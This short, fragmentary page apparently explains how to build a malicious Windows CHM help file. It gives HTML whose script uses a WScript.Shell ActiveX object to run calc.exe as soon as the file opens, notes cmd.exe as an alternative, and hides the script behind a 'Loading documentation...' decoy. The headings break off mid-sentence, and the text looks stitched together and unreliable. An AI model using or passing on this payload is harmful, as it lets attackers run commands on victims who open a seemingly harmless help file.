Hh.exe Exploit Official

hhc.exe project.hhp

Attackers can embed a shortcut (.lnk) that executes:

(e.g., index.html):

<!DOCTYPE html>
<html>
<head>
  <title>Help</title>
  <script language="javascript">
    // Runs immediately when the CHM is opened
    var shell = new ActiveXObject("WScript.Shell");
    shell.Run("calc.exe", 0, false); // or cmd.exe /c whoami > out.txt
  </script>
</head>
<body>
  <p>Loading documentation...</p>
</body>
</html>

(using hhc.exe from HTML Help Workshop):